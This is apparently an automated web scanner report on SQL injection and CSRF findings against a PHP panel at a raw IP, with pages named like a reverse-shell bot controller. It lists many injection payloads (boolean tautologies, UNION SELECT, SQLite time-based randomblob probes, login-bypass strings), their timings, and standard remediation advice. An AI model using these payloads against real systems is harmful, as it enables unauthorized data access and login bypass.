| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1 ASC -- |
| Evidence | |
| Request Header - size: 712 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+%221%22%3D%221%22+--+ |
| Method | GET |
| Parameter | id |
| Attack | 54" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 733 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=%22+OR+%221%22%3D%221&customArgs= |
| Method | GET |
| Parameter | dllFunction |
| Attack | " OR "1"="1 |
| Evidence | |
| Request Header - size: 993 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2 |
| Method | GET |
| Parameter | id |
| Attack | 56-2 |
| Evidence | |
| Request Header - size: 706 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%25 |
| Method | GET |
| Parameter | query |
| Attack | query% |
| Evidence | |
| Request Header - size: 474 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+ |
| Method | GET |
| Parameter | query |
| Attack | query AND 1=1 -- |
| Evidence | |
| Request Header - size: 485 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%22+AND+%221%22%3D%221%22+--+ |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 632 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+%271%27%3D%271%27+--+ |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 1,090 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW+AND+1%3D1+--+ |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 -- |
| Evidence | |
| Request Header - size: 1,075 bytes. | |
| Request Body - size: 129 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | customArgs |
| Attack | OR 1=1 -- |
| Evidence | |
| Request Header - size: 855 bytes. | |
| Request Body - size: 152 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | limit |
| Attack | ' UNION SELECT @@version -- -" OR "1"="1 |
| Evidence | |
| Request Header - size: 855 bytes. | |
| Request Body - size: 160 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | params |
| Attack | ' UNION SELECT @@version -- - AND 1=1 -- |
| Evidence | |
| Request Header - size: 855 bytes. | |
| Request Body - size: 152 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"% |
| Evidence | |
| Request Header - size: 856 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 871 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2 |
| Method | POST |
| Parameter | id |
| Attack | 56-2 |
| Evidence | |
| Request Header - size: 857 bytes. | |
| Request Body - size: 138 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+ |
| Method | POST |
| Parameter | query |
| Attack | query AND 1=1 -- |
| Evidence | |
| Request Header - size: 505 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 60 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40018 |
|
High |
SQL Injection - Authentication Bypass |
|---|---|
| Description |
SQL injection may be possible on a login page, potentially allowing the application's authentication mechanism to be bypassed
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows" OR 1=1 -- |
| Evidence | |
| Request Header - size: 635 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 -- |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 129 bytes. | |
| Response Header - size: 253 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 3 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40018 |
|
High |
SQL Injection - SQLite |
|---|---|
| Description |
SQL injection may be possible.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | query |
| Attack | query" | case randomblob(100000) when not null then "" else "" end -- |
| Evidence | The query time is controllable using parameter value [query" | case randomblob(100000) when not null then "" else "" end --], which caused the request to take [1,062] milliseconds, parameter value [query" | case randomblob(10000000) when not null then "" else "" end --], which caused the request to take [2,143] milliseconds, when the original unmodified query with value [query] took [455] milliseconds. |
| Request Header - size: 319 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20-- |
| Method | GET |
| Parameter | query |
| Attack | case randomblob(10000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [2,172] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [4,246] milliseconds, when the original unmodified query with value [query] took [1,458] milliseconds. |
| Request Header - size: 494 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,097] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [2,074] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [867] milliseconds. |
| Request Header - size: 298 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [347] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [828] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [191] milliseconds. |
| Request Header - size: 252 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [608] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [92] milliseconds. |
| Request Header - size: 252 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [776] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [848] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [233] milliseconds. |
| Request Header - size: 255 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | 327qi |
| Attack | " | case randomblob(100000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [776] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,260] milliseconds, when the original unmodified query with value [327qi] took [535] milliseconds. |
| Request Header - size: 531 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | query |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [1,609] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,848] milliseconds, when the original unmodified query with value [query] took [2,021] milliseconds. |
| Request Header - size: 313 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi * case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [327qi * case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,798] milliseconds, parameter value [327qi * case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [3,873] milliseconds, when the original unmodified query with value [327qi] took [1,017] milliseconds. |
| Request Header - size: 522 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | error.wav |
| Attack | " | case randomblob(100000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [1,912] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,091] milliseconds, when the original unmodified query with value [error.wav] took [1,200] milliseconds. |
| Request Header - size: 537 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | " | case randomblob(1000000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(1000000) when not null then "" else "" end | "], which caused the request to take [1,739] milliseconds, parameter value [" | case randomblob(100000000) when not null then "" else "" end | "], which caused the request to take [3,633] milliseconds, when the original unmodified query with value [Sound Effects] took [1,807] milliseconds. |
| Request Header - size: 532 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | Accept |
| Attack | case randomblob(10000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,045] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [2,271] milliseconds, when the original unmodified query with value [text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7] took [909] milliseconds. |
| Request Header - size: 671 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 255 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | " | case randomblob(100000) when not null then "" else "" end | " |
| Evidence | The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [182] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [254] milliseconds, when the original unmodified query with value [142.202.242.172] took [179] milliseconds. |
| Request Header - size: 799 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | ' | case randomblob(100000) when not null then "" else "" end | ' |
| Evidence | The query time is controllable using parameter value [' | case randomblob(100000) when not null then "" else "" end | '], which caused the request to take [761] milliseconds, parameter value [' | case randomblob(10000000) when not null then "" else "" end | '], which caused the request to take [2,198] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [228] milliseconds. |
| Request Header - size: 725 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [550] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,134] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [87] milliseconds. |
| Request Header - size: 240 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | key |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [728] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [95] milliseconds. |
| Request Header - size: 243 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | case randomblob(100000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [499] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,482] milliseconds, when the original unmodified query with value [DESKTOP-95IQEEV] took [2,031] milliseconds. |
| Request Header - size: 818 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | limit |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [947] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,144] milliseconds, when the original unmodified query with value [' UNION SELECT @@version -- -] took [769] milliseconds. |
| Request Header - size: 997 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | POST |
| Parameter | 327qi |
| Attack | case randomblob(1000000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,236] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,418] milliseconds, when the original unmodified query with value [327qi] took [1,641] milliseconds. |
| Request Header - size: 319 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [366] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [581] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [146] milliseconds. |
| Request Header - size: 554 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | key |
| Attack | case randomblob(100000) when not null then 1 else 1 end |
| Evidence | The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [501] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [986] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [127] milliseconds. |
| Request Header - size: 554 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 21 |
| Solution |
Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 40024 |
|
Medium |
Absence of Anti-CSRF Tokens |
|---|---|
| Description |
No Anti-CSRF tokens were found in a HTML submission form.
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
